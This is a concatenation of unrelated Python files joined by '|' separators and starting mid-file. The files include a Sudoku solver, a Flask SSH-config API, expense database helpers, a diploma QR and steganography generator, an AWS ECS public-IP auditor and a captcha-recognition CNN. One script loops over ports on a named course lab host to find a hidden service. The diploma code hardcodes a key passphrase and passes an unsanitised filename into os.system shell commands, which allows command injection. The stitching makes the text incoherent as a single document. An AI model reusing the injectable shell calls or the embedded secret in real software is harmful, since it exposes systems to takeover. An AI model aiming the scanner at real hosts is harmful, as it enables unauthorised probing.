self.grid_size = self.grid.size
self.counter = 0
self.time = 0
self.solutions = []
def __set(self, x, y, value):
self.counter += 1
self.grid[x][y] = value
def __find_candidates(self, x, y):
"""Find candidates for grid[x][y] by examining all its neighbours"""
candidates = [True] * 10
for x1, y1 in itertools.chain(
self.grid.get_row_coordinates(x),
self.grid.get_col_coordinates(y),
self.grid.get_box_coordinates(x, y)
):
candidates[self.grid[x1][y1] - 1] = False
return [i + 1 for i, candidate in enumerate(candidates) if candidate]
def __next_coordinate(self, x, y):
# loop back to front of next line at the end of each line
return x + (y + 1) // self.grid_size, (y + 1) % self.grid_size
def __solve(self, x, y):
if x == self.grid_size:
self.solutions.append(self.grid.clone())
return
x1, y1 = self.__next_coordinate(x, y)
# if this is a known value, just go the next one
if self.grid[x][y] != 0:
return self.__solve(x1, y1)
# examine the row, column and box to find suitable candidates
# then go through that list one-by-one until the right one is found
candidates = self.__find_candidates(x, y)
for c in candidates:
self.__set(x, y, c)
if self.__solve(x1, y1):
return True
self.grid[x][y] = 0
def solve(self):
print('Crunching numbers...')
start = time.time()
self.__solve(0, 0)
self.time = time.time() - start
if not self.solutions:
print('No solutions found.')
elif len(self.solutions) > 1:
print(f'Invalid grid - {len(self.solutions)} solutions found.')
else:
print()
GridPrinter(self.solutions[0]).display()
print()
self.print_stats()
return self.solutions[0]
return None
def print_stats(self):
print('Values set: {}'.format(self.counter))
print('Time taken: {:.2f}s'.format(self.time))
|
from __future__ import print_function
from collections import OrderedDict
from json import loads
from re import sub
from flask import Flask, jsonify, request, Response
from flask.json import JSONEncoder
class Keyword(object):
def __init__(self, keyword, argument):
self.keyword = keyword
self.argument = argument
def __str__(self):
return "%s = %s" % (self.keyword, self.argument)
class FlexibleJsonEncoder(JSONEncoder):
def default(self, object_to_encode):
if isinstance(object_to_encode, Keyword):
return object_to_encode.argument
return object_to_encode
class Host(OrderedDict):
def __init__(self, name=None, **set_keywords):
OrderedDict.__init__(self)
self['host'] = Keyword('host', name)
for keyword, argument in set_keywords.items():
self[keyword.lower()] = Keyword(keyword, argument)
def __str__(self):
output = "%s\n" % self['host']
for keyword in [
internal_keyword
for internal_keyword
in self
if internal_keyword != 'host'
]:
output += " %s\n" % self[keyword]
output += '\n'
return output
class SshConfig(OrderedDict):
def __init__(self, file_path):
OrderedDict.__init__(self)
self.file_path = file_path
def __str__(self):
output = ''
for host in self:
output += "# %s\n%s" % (host, self[host])
return sub(r'\n+$', '\n', output)
app = Flask(__name__)
app.json_encoder = FlexibleJsonEncoder
config_file = SshConfig('some/file/path')
dummy_host = Host('fakehost', user='fakeuser')
dummy_host['hostname'] = Keyword('hostname', 'fakehostname')
dummy_host['port'] = Keyword('port', 9001)
config_file['host1'] = dummy_host
config_file['host2'] = dummy_host
@app.route('/hosts', methods=['GET'])
def get_hosts():
hosts = []
for host in config_file:
hosts.append(config_file[host])
return jsonify(hosts)
@app.route('/hosts', methods=['POST'])
def create_host():
new_host = Host(**request.json)
return jsonify(new_host)
@app.route('/config', methods=['GET'])
def get_config():
return jsonify(config_file)
@app.route('/config', methods=['POST'])
def create_config():
new_config = SshConfig('some/file/path')
return Response('It doesn\'t do anything yet', 200)
|
import bcrypt
from datetime import datetime
from sqlalchemy.exc import IntegrityError
from sqlalchemy import and_
from models import User, Category, Expense
def category_insert(session, category_title):
"""
Function to create category
:param session:
:param category_title:
:return: returns created category
"""
category = Category(title=category_title.upper())
session.add(category)
try:
session.commit()
except IntegrityError:
session.rollback()
category = get_category(session, category_title=category_title)
print(f"New category created with title: {category_title}")
return category
def expense_insert(
session, category_id, user_id, price, year=None, month=None, day=None
):
"""
Function to create expense
:param day: day
:param month: month
:param year: year
:param session: current db session
:param category_id: category id
:param user_id: user id
:param price: price of expense
:return: returns created expense
"""
if year and month and day:
expense_date = datetime(year, month, day)
expense = Expense(
category_id=category_id,
user_id=user_id,
price=price,
timestamp=expense_date,
)
else:
expense = Expense(category_id=category_id, user_id=user_id, price=price)
session.add(expense)
session.commit()
print("Expense inserted")
return expense
def user_insert(session, username, password1, password2):
"""
Function to create user
:param session: current db session
:param username: username
:param password1: password
:param password2: password to verify
:return: returns user if password verified and no user with same username
"""
password = verify_password(password1, password2)
if password:
user = User(username=username, password=password)
session.add(user)
try:
session.commit()
except IntegrityError:
session.rollback()
print("Username already taken. Please try other username.")
else:
print(f"User was created with username {username}")
return user
else:
print("Your passwords is not matching.")
def verify_password(password1, password2):
"""
Password verification function
:return: hashed password if verified else None
"""
if password1 == password2:
return bcrypt.hashpw(password1.encode("utf-8"), bcrypt.gensalt())
return None
def get_user(session, username, password):
"""
Private function to get users
:param session: current db session
:param username: username
:param password: password
:return: user if found, else None
"""
user = session.query(User).filter_by(username=username).first()
if user and bcrypt.checkpw(password.encode("utf-8"), user.password):
return user
return None
def get_category(session, category_title=None, category_id=None):
"""
Function to get category by id or title
:param session: current db session
:param category_title: category title
:param category_id: cateogry id
:return: category or None if does not exist
"""
category = None
if category_title:
category = session.query(Category).filter_by(title=category_title).first()
elif category_id:
category = session.query(Category).filter_by(category_id=category_id).first()
return category
def get_categories(session):
"""
Function to get all categories
:param session: current db session
:return: category list
"""
print("ID\tCATEGORY TITLE")
categories = session.query(Category).all()
for category in categories:
print(f"{category.category_id}\t{category.title}")
return categories
def get_expenses_by_params(
session, user_id, category_id=None, year=None, month=None, day=None
):
"""
Function to get expenses by some params
:param session: current db session
:param user_id: user id
:param category_id: category id
:param year: year
:param month: month
:param day: day
:return: returns list of expenses
"""
if year and not month and not day:
expenses = get_expenses_by_year(session, user_id, year)
elif year and month and not day:
expenses = get_expenses_by_month(session, user_id, year, month)
elif year and month and day:
expenses = get_expenses_by_day(session, user_id, year, month, day)
elif category_id:
expenses = get_expenses_by_category(session, user_id, category_id)
else:
expenses = get_expenses_of_user(session, user_id)
return expenses
def get_expenses_by_year(session, user_id, year):
"""
Function to get expenses by year
:param session: current db session
:param user_id: user id
:param year: year
:return: returns list of expenses
"""
date_begin = datetime(year=year, month=1, day=1)
date_end = datetime(year=year + 1, month=1, day=1)
expenses = (
session.query(Expense)
.filter_by(user_id=user_id)
.filter(and_(Expense.timestamp >= date_begin, Expense.timestamp < date_end))
)
return expenses
def get_expenses_by_month(session, user_id, year, month):
"""
Function to get expenses by month
:param session: current db session
:param user_id: user id
:param year: year
:param month: month
:return: returns list of expenses
"""
date_begin = datetime(year=year, month=month, day=1)
date_end = datetime(year=year, month=month + 1, day=1)
expenses = (
session.query(Expense)
.filter_by(user_id=user_id)
.filter(and_(Expense.timestamp >= date_begin, Expense.timestamp < date_end))
)
return expenses
def get_expenses_by_day(session, user_id, year, month, day):
"""
Function to get expenses by day
:param session: current db session
:param user_id: user id
:param year: year
:param month: month
:param day: day
:return: returns list of expenses
"""
date_begin = datetime(year=year, month=month, day=day)
date_end = datetime(year=year, month=month, day=day + 1)
expenses = (
session.query(Expense)
.filter_by(user_id=user_id)
.filter(and_(Expense.timestamp >= date_begin, Expense.timestamp < date_end))
)
return expenses
def get_expenses_by_category(session, user_id, category_id):
"""
Function to get expenses by category
:param session: current db session
:param user_id: user id
:param category_id: category id
:return: returns list of expenses
"""
expenses = session.query(Expense).filter_by(
user_id=user_id, category_id=category_id
)
return expenses
def get_expenses_of_user(session, user_id):
"""
Function to get all expenses of user
:param session: current db session
:param user_id: user id
:return: returns list of expenses
"""
expenses = session.query(Expense).filter_by(user_id=user_id)
return expenses
|
import os
import base64
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64
import qrcode
from PIL import Image,ImageDraw,ImageFont
from shutil import copyfile
from src.stegano import *
from pyzbar import pyzbar
import time
from asn1crypto import tsp
path_parent = os.path.dirname(os.getcwd())
def encrypt_private_key(a_message, private_key):
encryptor = PKCS1_OAEP.new(private_key)
encrypted_msg = encryptor.encrypt(a_message.encode())
encoded_encrypted_msg = base64.b64encode(encrypted_msg)
return encoded_encrypted_msg
def verifie(encrypt_message):
with open(os.getcwd()+os.path.sep+'private'+os.path.sep+'key.pem','r') as f :
private_keys = RSA.importKey(f.read(),passphrase="keepbreathing")
return decrypt_public_key(encrypt_message,private_keys)
def decrypt_public_key(encoded_encrypted_msg, public_key):
encryptor = PKCS1_OAEP.new(public_key)
decoded_encrypted_msg = base64.b64decode(encoded_encrypted_msg)
decoded_decrypted_msg = encryptor.decrypt(decoded_encrypted_msg)
return decoded_decrypted_msg
def sign(token):
with open(os.getcwd()+os.path.sep+"cert"+os.path.sep+"cert.pem","r") as certif:
public_key = RSA.importKey(certif.read())
return encrypt_private_key(token,public_key)
def generate_qrcode(secret_data, path,id_diploma):
token = sign(secret_data)
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_H,
box_size=10,
border=4,
)
qr.add_data(token)
qr.make(fit=True)
img_qr = qr.make_image(fill_color="black", back_color="white").convert('RGB')
img_qr.save("qr_temp.png")
diploma = Image.open(path)
img_qr = Image.open("qr_temp.png")
img_qr.thumbnail((350,350))
qr_pos = (diploma.size[0]-360,diploma.size[1]-360)
diploma.paste(img_qr,qr_pos)
diploma.save(os.getcwd()+os.path.sep+"Diplomas"+os.path.sep+"diploma_"+str(id_diploma)+'.png')
def generate_unique_diploma(user,diploma):
"""print Name, diploma and years on diploma and make some steganography to
transform standard picture to a unique one"""
copyfile(os.getcwd()+os.path.sep+"assets"+os.path.sep+"empty_diploma.png","temp.png")
img = Image.open('temp.png')
ts = str(time.time())
#ts = timeStamp('temp.png')
#ts = ts[:ts.find('b"')]
#ts = ts.replace("<asn1crypto.core.OctetString ","")
secret_data= user.first_name+user.name+diploma.specialisation+user.school+str(diploma.graduation_years)+ts
ls =len(secret_data)
if ls < 64 :
for i in range(64-ls):
secret_data+='.'
empty_dip = Image.open("temp.png")
d = ImageDraw.Draw(empty_dip)
fnt = ImageFont.truetype(os.getcwd()+os.path.sep+'assets'+os.path.sep+'AlgerianRegular.ttf', 50)
pos_user = ((empty_dip.size[0]//2-200,empty_dip.size[1]//2-100))
pos_diploma=((empty_dip.size[0]//2-200,empty_dip.size[1]//2-50))
pos_years = ((empty_dip.size[0]//2-100,empty_dip.size[1]//2))
user_draw = user.first_name +' '+user.name
diploma_draw = diploma.specialisation +' '+user.school
d.text(pos_user,user_draw,fill=(0,0,0),font=fnt)
d.text(pos_diploma,diploma_draw,fill=(0,0,0),font=fnt)
d.text(pos_years,str(diploma.graduation_years),fill=(0,0,0),font=fnt)
empty_dip.save("ready_to_qr.png")
print('drawing done')
generate_qrcode(secret_data,'ready_to_qr.png',diploma._id)
img=Image.open(os.getcwd()+os.path.sep+"Diplomas"+os.path.sep+"diploma_"+str(diploma._id)+'.png')
cacher(img,secret_data)
img.save("Diplomas"+os.path.sep+"diploma_"+str(diploma._id)+'.png')
print('diploma_generated')
#cleaning temp file
os.remove("temp.png")
os.remove("ready_to_qr.png")
os.remove('qr_temp.png')
print('cleaning done')
def decrypt_img(filename):
diploma = Image.open(filename)
qr = pyzbar.decode(diploma)
encryp_me = qr[0].data.decode()
return [verifie(encryp_me).decode(),recuperer(diploma,64)]
def timeStamp(filename):
os.system('openssl ts -query -data '+filename+' -no_nonce -sha512 -cert -out '+filename+'.tsq' )
os.system('curl -H "Content-Type: application/timestamp-query" --data-binary '+'"@'+filename+'.tsq" '+'freetsa.org/tsr >'+filename+'.tsr')
with open(filename+'.tsr', 'rb') as f :
res = tsp.TimeStampResp.load(f.read())
token = res['time_stamp_token']
signed_data = token['content']
signer_infos = signed_data['signer_infos']
signer_info = signer_infos[0]
signed_attrs = signer_info['signed_attrs']
signature = signer_info['signature']
print(signed_attrs)
return str(signature)
|
import pandas as pd
import sys
import os
import argparse
import shutil
import datetime
import tldextract
import csv
import json
import pyfiglet
import random
from fnmatch import fnmatch
## custom functions
from utilities.helpers import (makedirs, clean_string, compress_text)
export_dir = "export"
url_data = "url_data"
# process arguments
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--export", dest="exp", default="current", help="Specify 'current' or 'all'.")
args = parser.parse_args()
whattodo = args.exp
if whattodo == "current":
pass
elif whattodo == "all":
pass
else:
sys.exit("Specify the type of export. '-e current' exports the latest urls; '-e all' exports all records.")
d = datetime.datetime.today()
year = d.strftime("%Y")
month = d.strftime("%m")
day = d.strftime("%d")
date_filename = year + "_" + month + "_" + day
# define dataframes
df_export = pd.DataFrame(columns=['url', 'initial_save', 'accessed_on', 'pdf', 'current', 'filename_full', 'full_count', 'filename_text', 'text_count', 'text_hash', 'filename_snippet', 'first', 'last', 'middle'])
## If we're running an export let's get it done and get out
makedirs(export_dir)
file_ext = "*.json"
for path, subdirs, files in os.walk(url_data):
for f in files:
if fnmatch(f,file_ext):
appdata = os.path.join(path,f)
with open(appdata) as input:
data = json.load(input)
try:
url = data['url']
except:
url = ""
try:
initial_save = data['first_saved']
except:
initial_save = ""
try:
accessed_on = data['accessed_on']
except:
accessed_on = ""
try:
pdf = data['run_pdf']
except:
pdf = ""
try:
current = data['current']
except:
current = ""
try:
filename_full = data['filename_full']
except:
filename_full = ""
try:
full_count = data['full_count']
except:
full_count = ""
try:
filename_text = data['filename_text']
except:
filename_text = ""
try:
text_count = data['text_count']
except:
text_count = ""
try:
text_hash = data['text_hash']
except:
text_hash = ""
try:
filename_snippet = data['filename_snippet']
except:
filename_snippet = ""
try:
first = data['first']
except:
first = ""
try:
last = data['last']
except:
last = ""
try:
middle = data['middle']
except:
middle = ""
export_obj = pd.Series([url, initial_save, accessed_on, pdf, current, filename_full, full_count, filename_text, text_count, text_hash, filename_snippet, first, last, middle], index=df_export.columns)
df_export = df_export.append(export_obj, ignore_index=True)
if whattodo == "current":
df_export = df_export[(df_export['current'] == "yes")]
else:
pass
export_out = export_dir + "/" + date_filename + "_" + whattodo + ".csv"
df_export.to_csv(export_out, encoding='utf-8', index=False)
print(f"Export written to {export_out}")
|
#/usr/bin/python
import os, shutil, sys, getopt, json
from pprint import pprint
from jinja2 import Environment, FileSystemLoader
class Speaker:
name = ''
email = ''
def __init__(self, name, email):
self.name = name
self.email = email
def __repr__(self):
return "Speaker[name={}]".format(self.name)
class Feedback:
def __init__(self):
self.session = ''
self.speakers = []
self.speaker = []
self.technical = []
self.overall = []
def __repr__(self):
return "Feedback[session={}, speakers={}, speaker={}, technical={}, overall={}]".format(self.session, self.speakers, self.speaker, self.technical, self.overall)
def parse_feedback(feedback, sessions, speakers):
fs = []
for session_id in feedback:
fb = Feedback()
session = sessions[session_id]
if 'speakers' not in session:
continue
fb.session = session['name']
for speaker_id in session['speakers']:
speaker = speakers[speaker_id]
fb.speakers.append(Speaker(speaker['name'], ''))#speaker['email']))
for fb_key in feedback[session_id]:
fb.speaker.append(feedback[session_id][fb_key]['speaker'])
fb.technical.append(feedback[session_id][fb_key]['technical'])
fb.overall.append(feedback[session_id][fb_key]['overall'])
fs.append(fb)
return fs
def usage():
print("{}: Generates emails based on attendee feedback.".format(sys.argv[0]))
print("")
print("-i, --infile The exported json data from your Firebase instance")
print("-t, --template The email template file to use [default=\"./template.html\"")
print("-o, --outdir The output directory to write the emails to [default=\"./output\"")
def main(argv):
inputfile = ''
outputdir = './output'
template = './template.html'
try:
opts, args = getopt.getopt(argv, "i:t:o:", ["infile=", "template=", "outdir="])
except getopt.GetoptError:
usage()
sys.exit(2)
if not inputfile:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-i", "--infile"):
inputfile = arg
elif opt in ("-t", "--template"):
template = arg
elif opt in ("-o", "--outdir"):
outputdir = arg
print("cleaning output dir: {}".format(outputdir))
if os.path.isfile(outputdir) or os.path.isdir(outputdir):
shutil.rmtree(outputdir)
os.mkdir(outputdir)
j2_env = Environment(loader=FileSystemLoader(os.getcwd()),
trim_blocks=True)
template = j2_env.get_template(template)
with open(inputfile) as file:
data = json.load(file)
for session_id in data['feedback']:
session = data['sessions'][session_id]
if 'speakers' not in session:
continue
for speaker_id in session['speakers']:
fbs = data['feedback'][session_id].values()
averages = {
'speaker': 0,
'technical': 0,
'overall': 0
}
for fb in fbs:
averages['speaker'] += fb['speaker']
averages['technical'] += fb['technical']
averages['overall'] += fb['overall']
averages['speaker'] /= len(fbs)
averages['technical'] /= len(fbs)
averages['overall'] /= len(fbs)
email = template.render(speaker=data['speakers'][speaker_id], session=session, averages=averages, feedback=data['feedback'][session_id].values())
with open(os.path.join(outputdir, "{}-{}.html".format(speaker_id, session_id)), "wb") as f:
f.write(email)
print("wrote {}-{} email".format(speaker_id, session_id))
if __name__ == "__main__":
main(sys.argv[1:])
|
import json
from shared import get_session_for_account, fetch_all_accounts, send_notification
from policyuniverse.policy import Policy
from policyuniverse.statement import Statement
def audit(resource, remediate=False):
is_compliant = True
if resource["type"] != "ecs_service":
raise Exception(
"Mismatched type. Expected {} but received {}".format(
"ecs_service", resource["type"]
)
)
# Get a session in the account where this resource is
ecs = get_session_for_account(resource["account"], resource["region"], "ecs")
ecs_is_public = False
try:
## List all ECS Clusters
ecs_clusters = ecs.list_clusters()
## Now get all cluster ARNs from ECS clusters json
cluster_arns = ecs_clusters["clusterArns"]
## For each cluster, try to find the named service
ecs_description = []
service_cluster = ""
for cluster in cluster_arns:
svc_description = ecs.describe_services(
cluster = cluster,
services = [resource["id"]]
)
## If the services array contains an object then set ecs_description to the services array of the cluster
## Set cluster variable to the cluster ARN
if len(svc_description['services']) > 0:
ecs_description = svc_description['services']
service_cluster = cluster
for ecs_svc in ecs_description:
if ecs_svc['networkConfiguration']['awsvpcConfiguration']['assignPublicIp'] == 'ENABLED':
ecs_is_public = True
except Exception as e:
print(e)
print("No ECS Services Definition: {}".format(resource["id"]))
if ecs_is_public:
is_compliant = False
issue = "ECS {} is public via Public IP".format(resource["id"])
if remediate:
for ecs_svc in ecs_description:
is_compliant = remediation_make_ecs_private(resource, ecs, service_cluster,ecs_svc['networkConfiguration']['awsvpcConfiguration'])
if not is_compliant:
issue += " - Not remediated"
send_notification(issue, "", resource)
if is_compliant:
print("ECS is private: {}".format(resource["id"]))
return is_compliant
def remediation_make_ecs_private(resource, ecs, cluster, networkConfiguration):
try:
ecs.update_service(
cluster= cluster,
service = resource['id'],
forceNewDeployment=True,
networkConfiguration = {
'awsvpcConfiguration': {
'subnets': networkConfiguration['subnets'],
'securityGroups': networkConfiguration['securityGroups'],
'assignPublicIp':'DISABLED'
}
}
)
except Exception as e:
print(e)
return False
return True
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""LSTM projection cell with cell clip and projection clip."""
__all__ = ['LSTMPCellWithClip']
from mxnet.gluon.contrib.rnn import LSTMPCell
class LSTMPCellWithClip(LSTMPCell):
r"""Long-Short Term Memory Projected (LSTMP) network cell with cell clip and projection clip.
Each call computes the following function:
.. math::
\DeclareMathOperator{\sigmoid}{sigmoid}
\begin{array}{ll}
i_t = \sigmoid(W_{ii} x_t + b_{ii} + W_{ri} r_{(t-1)} + b_{ri}) \\
f_t = \sigmoid(W_{if} x_t + b_{if} + W_{rf} r_{(t-1)} + b_{rf}) \\
g_t = \tanh(W_{ig} x_t + b_{ig} + W_{rc} r_{(t-1)} + b_{rg}) \\
o_t = \sigmoid(W_{io} x_t + b_{io} + W_{ro} r_{(t-1)} + b_{ro}) \\
c_t = c_{\text{clip}}(f_t * c_{(t-1)} + i_t * g_t) \\
h_t = o_t * \tanh(c_t) \\
r_t = p_{\text{clip}}(W_{hr} h_t)
\end{array}
where :math:`c_{\text{clip}}` is the cell clip applied on the next cell;
:math:`r_t` is the projected recurrent activation at time `t`,
:math:`p_{\text{clip}}` means apply projection clip on he projected output.
math:`h_t` is the hidden state at time `t`, :math:`c_t` is the
cell state at time `t`, :math:`x_t` is the input at time `t`, and :math:`i_t`,
:math:`f_t`, :math:`g_t`, :math:`o_t` are the input, forget, cell, and
out gates, respectively.
Parameters
----------
hidden_size : int
Number of units in cell state symbol.
projection_size : int
Number of units in output symbol.
i2h_weight_initializer : str or Initializer
Initializer for the input weights matrix, used for the linear
transformation of the inputs.
h2h_weight_initializer : str or Initializer
Initializer for the recurrent weights matrix, used for the linear
transformation of the hidden state.
h2r_weight_initializer : str or Initializer
Initializer for the projection weights matrix, used for the linear
transformation of the recurrent state.
i2h_bias_initializer : str or Initializer, default 'lstmbias'
Initializer for the bias vector. By default, bias for the forget
gate is initialized to 1 while all other biases are initialized
to zero.
h2h_bias_initializer : str or Initializer
Initializer for the bias vector.
prefix : str
Prefix for name of `Block`s
(and name of weight if params is `None`).
params : Parameter or None
Container for weight sharing between cells.
Created if `None`.
cell_clip : float
Clip cell state between `[-cell_clip, cell_clip]` in LSTMPCellWithClip cell
projection_clip : float
Clip projection between `[-projection_clip, projection_clip]` in LSTMPCellWithClip cell
"""
def __init__(self, hidden_size, projection_size,
i2h_weight_initializer=None, h2h_weight_initializer=None,
h2r_weight_initializer=None,
i2h_bias_initializer='zeros', h2h_bias_initializer='zeros',
input_size=0, cell_clip=None, projection_clip=None, prefix=None, params=None):
super(LSTMPCellWithClip, self).__init__(hidden_size,
projection_size,
i2h_weight_initializer,
h2h_weight_initializer,
h2r_weight_initializer,
i2h_bias_initializer,
h2h_bias_initializer,
input_size,
prefix=prefix,
params=params)
self._cell_clip = cell_clip
self._projection_clip = projection_clip
# pylint: disable= arguments-differ
def hybrid_forward(self, F, inputs, states, i2h_weight,
h2h_weight, h2r_weight, i2h_bias, h2h_bias):
r"""Hybrid forward computation for Long-Short Term Memory Projected network cell
with cell clip and projection clip.
Parameters
----------
inputs : input tensor with shape `(batch_size, input_size)`.
states : a list of two initial recurrent state tensors, with shape
`(batch_size, projection_size)` and `(batch_size, hidden_size)` respectively.
Returns
--------
out : output tensor with shape `(batch_size, num_hidden)`.
next_states : a list of two output recurrent state tensors. Each has
the same shape as `states`.
"""
prefix = 't%d_'%self._counter
i2h = F.FullyConnected(data=inputs, weight=i2h_weight, bias=i2h_bias,
num_hidden=self._hidden_size*4, name=prefix+'i2h')
h2h = F.FullyConnected(data=states[0], weight=h2h_weight, bias=h2h_bias,
num_hidden=self._hidden_size*4, name=prefix+'h2h')
gates = i2h + h2h
slice_gates = F.SliceChannel(gates, num_outputs=4, name=prefix+'slice')
in_gate = F.Activation(slice_gates[0], act_type='sigmoid', name=prefix+'i')
forget_gate = F.Activation(slice_gates[1], act_type='sigmoid', name=prefix+'f')
in_transform = F.Activation(slice_gates[2], act_type='tanh', name=prefix+'c')
out_gate = F.Activation(slice_gates[3], act_type='sigmoid', name=prefix+'o')
next_c = F._internal._plus(forget_gate * states[1], in_gate * in_transform,
name=prefix+'state')
if self._cell_clip is not None:
next_c = next_c.clip(-self._cell_clip, self._cell_clip)
hidden = F._internal._mul(out_gate, F.Activation(next_c, act_type='tanh'),
name=prefix+'hidden')
next_r = F.FullyConnected(data=hidden, num_hidden=self._projection_size,
weight=h2r_weight, no_bias=True, name=prefix+'out')
if self._projection_clip is not None:
next_r = next_r.clip(-self._projection_clip, self._projection_clip)
return next_r, [next_r, next_c]
|
t=int(input()) #To accept number of testcases
while(t!=0):
n,k=input().split() #accept the input
n=int(n)
k=int(k)
arr=list(map(int,input().split())) # to get the array of elements
dict={}
for i in arr:
if i in dict:
dict[i]+=1 #if element present in dict increment by one
else:
dict[i]=1 #if element not present the dict intialise with 1
#store the key and values of dict in lists
key_list = list(dict.keys())
val_list = list(dict.values())
for i in dict:
if dict[i]==1:
print(key_list[val_list.index(dict[i])]) #print the key of the unique element present the given arr of elements
t-=1 #decrement the number of test cases by 1
|
from __future__ import absolute_import, unicode_literals
from typing import Any, Dict
from django.utils.translation import ugettext as _
from wiki.core.plugins import registry
from wiki.core.plugins.base import BasePlugin
from . import settings
from .mdx.otis import OTISExtension
class HaxxPlugin(BasePlugin):
slug = settings.SLUG
sidebar: Dict[str, Any] = {
'headline': _('OTIS'),
'icon_class': 'fa-info-circle',
'template': 'wikihaxx/sidebar.html',
'form_class': None,
'get_form_kwargs': (lambda a: {})
}
markdown_extensions = [
OTISExtension(),
]
registry.register(HaxxPlugin)
|
""" CNN model architecture for captcha
"""
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
from config import args
class Net(nn.Module):
def __init__(self, output):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, stride=1, padding=1)
self.conv2 = nn.Conv2d(32, 32, 3, stride=1, padding=1)
self.conv3 = nn.Conv2d(32, 64, 3, stride=1, padding=1)
self.conv4 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self.mp = nn.MaxPool2d(2)
self.dropout = nn.Dropout2d(0.5)
self.relu = nn.ReLU(inplace=True)
self.fc1 = nn.Linear(16 * 16 * 64, 1024)
self.fc2 = nn.Linear(1024, output)
def forward(self, x):
batch_size = x.size(0)
x = self.relu(self.conv1(x))
x = self.relu(self.conv2(x))
x = self.mp(x)
x = self.relu(self.conv3(x))
x = self.relu(self.conv4(x))
x = self.mp(x)
x = x.view(batch_size, -1)
x = self.dropout(x)
x = self.relu(self.fc1(x))
x = self.fc2(x)
return x
|
# encoding=UTF-8
# Copyright © 2010-2017 Jakub Wilk <jwilk@jwilk.net>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''
*python-morfeusz* is a Python interface to Morfeusz_,
a Polish morphological analyser.
.. _Morfeusz:
http://sgjp.pl/morfeusz/
'''
import io
import os
import distutils.core
from distutils.command.sdist import sdist as distutils_sdist
try:
import distutils644
except ImportError:
pass
else:
distutils644.install()
b'' # Python >= 2.6 is required
def get_version():
with io.open('doc/changelog', encoding='UTF-8') as file:
line = file.readline()
return line.split()[1].strip('()')
class cmd_sdist(distutils_sdist):
def maybe_move_file(self, base_dir, src, dst):
src = os.path.join(base_dir, src)
dst = os.path.join(base_dir, dst)
if os.path.exists(src):
self.move_file(src, dst)
def make_release_tree(self, base_dir, files):
distutils_sdist.make_release_tree(self, base_dir, files)
self.maybe_move_file(base_dir, 'LICENSE', 'doc/LICENSE')
classifiers = '''
Development Status :: 7 - Inactive
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Natural Language :: Polish
Operating System :: POSIX :: Linux
Operating System :: MacOS :: MacOS X
Operating System :: Microsoft :: Windows
Programming Language :: Python
Programming Language :: Python :: 2
Programming Language :: Python :: 3
Topic :: Text Processing :: Linguistic
'''.strip().splitlines()
distutils.core.setup(
name='python-morfeusz',
version=get_version(),
license='MIT',
description='interface to Morfeusz',
long_description=__doc__.strip(),
classifiers=classifiers,
url='http://jwilk.net/software/python-morfeusz',
author='Jakub Wilk',
author_email='jwilk@jwilk.net',
py_modules=['morfeusz'],
cmdclass = dict(
sdist=cmd_sdist,
)
)
# vim:ts=4 sts=4 sw=4 et
|
#// Don't forget to hit SUBSCRIBE, COMMENT, LIKE, SHARE! and LEARN... Its good to learn! :)
# But srsly, hit that sub button so you don't miss out on more content!
'''Port scanner FOR ports ending in 000 eg, 1000,2000,3000 etc -
untill find hidden service port'''
'''imports'''
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
#port = 1000
for portx in range(1, 100):
try:
s.connect(('ad.samsclass.info', portx))
r = s.recv(1024)
if 'Congratulations' in r.decode('utf8'):
print('[!] HIDDEN SERVICE FOUND: %s ~ %s' % (portx, r.decode('utf8')))
s.close()
break
else:
print('%s ~ %s' % (portx, r.decode('utf8')))
s.close()
except socket.error as err:
print('%s ~ %s' % (portx, err))
#port += 1000
|
from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.conf import settings
class TrsReport(object):
"""A report to send to a transmittal communication list."""
def __init__(self, trs_import):
self.trs_import = trs_import
self.email_list = trs_import.email_list
def get_subject(self):
raise NotImplementedError()
def get_body(self):
raise NotImplementedError()
def send(self):
"""Send the report to the email list."""
send_mail(
self.get_subject(),
self.get_body(),
settings.DEFAULT_FROM_EMAIL,
self.email_list
)
class ErrorReport(TrsReport):
def get_subject(self):
return 'Error log on transmittal %s' % self.trs_import.basename
def get_body(self):
context = {
'basename': self.trs_import.basename,
'errors': self.trs_import.errors,
}
tpl = render_to_string('reports/error.txt', context)
return tpl
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---------------------------------------
# Project: PKUYouth Webserver v2
# File: exceptions.py
# Created Date: 2020-07-27
# Author: Xinghong Zhong
# ---------------------------------------
# Copyright (c) 2020 PKUYouth
class PKUYouthException(Exception):
status_code = 400
